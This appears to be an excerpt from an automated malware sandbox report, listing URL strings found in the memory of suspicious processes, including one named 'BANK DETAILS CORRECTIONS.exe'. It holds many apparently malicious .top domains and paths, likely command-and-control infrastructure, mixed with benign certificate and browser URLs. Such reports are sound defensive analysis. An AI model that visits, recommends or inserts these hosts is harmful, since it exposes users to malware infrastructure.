                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ve
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/themes/flash/css/font-awesome.min.css?ver=6.4.3
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/themes/flash/css/responsive.min.css?ver=6.4.3
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-includes/css/dashicons.min.css?ver=6.4.3
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://iawnh.vwupe.top/5q32v/z1wofb5.xls
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://is4ml0.2xexb.top/z07/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ix18.oqry7.top/zdg4qfy/stvr0o7.xlsx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://joahk.soaw8.top/0jyift/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://jqyn6d.0dgqo.top/w876/7u54.doc
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://kiwbh1.soaw8.top/pl1wmh/y2yq.ppt
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lcj05un.1osh5.top/sucui0/7besnu.html
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lg7.n89m5.top/qu2/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lxoo4j.laoli666.top/2e0w/xted.html
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mmhzuz.1cva0.top/k82/3i00.doc
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://osmfn1.djzcz.top/ipb/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://p97bz5o.9rij9.top/3f82i/ffp.xlsx
                Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.0000000003E12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://parkingpage.namecheap.com
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://q8s.cjncj.top/26zhgy/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://qs8b6.89of0.top/jxq/1fu9.ppt
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1295194192.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 0000000D.00000002.1361939859.00000000028EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://t17a.77bdh.top/uwfn7k7/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://uj66st1.1lilr.top/lsqbk0/i9kj.ppt
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ut49ty3.jsj91.top/bcjz/bokt.docx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wi6o.k831s.top/7rs/rj5r1.ppt
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wuka.gjgmm.top/9ii7k/
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/08og/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/1dys/2jgjq.docx
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/1zn1q/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/2jtdy62/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/2r7b/mulenc.doc
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/302/riold.ppt
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/3iwe/ay869g.xlsx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/4d7o8gx/wpst3.ppt
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/5wkvv6a/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/6neav/srn3y3.xls
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/7fdwd/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/7qe/8l9zr.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/82shuw/dx44.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/a5y1q3v/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/aek2/l7bry89.html
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/aoekqf/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/can/czydx.docx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/e8miho/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/foxkl2/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/hnvto/h15.html
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/hw8q/jt5zl.docx
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/idvro/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/ik0/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/ju0/u2ln.doc
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/l1qnt/
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/m1o3h5q/
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/mdqixpy/vbk.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/min9s/q9e4xv.doc
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/n90o/x6eagu.xlsx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/qii/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/sw1bs0t/qq05.xlsx
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/ute33wk/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/vgjem/z1zm.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/wbb8f/mzs.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/xw7ci9/7fkzpf.docx
                Source: EnKifmZDGZ.exe, 00000019.00000002.3736975919.00000000053B5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.roblesprats.com
                Source: EnKifmZDGZ.exe, 00000019.00000002.3736975919.00000000053B5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.roblesprats.com/e6xn/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://xorep.s0kfn.top/6d1fct9/xg0p8x.ppt
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://xr3f3p.1cva0.top/n1qm0f/kn1v2.xlsx
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://0g2i8k.1cva0.top/oq6dhnh/zkfvtu.docx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://4mt4jb.ko6sc.top/6d92ec/oicfh3p.doc
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://4qghtl.7vp7f.top/zmhkm1/ydumpca.docx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://5hm.u3gee.top/u4g28a/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://61t.9nn9e.top/swk75l2/6a0.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://6c4.l0yg7.top/nv6hczm/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://7yx2zl.ss1yp.top/tj0852/x0qd1j.xls
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://85bj22.jsj91.top/2xat4/m98nsm.xls
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://8j3my.stgu5.top/322/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://8uu.65spz.top/dhqv/
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
                Source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
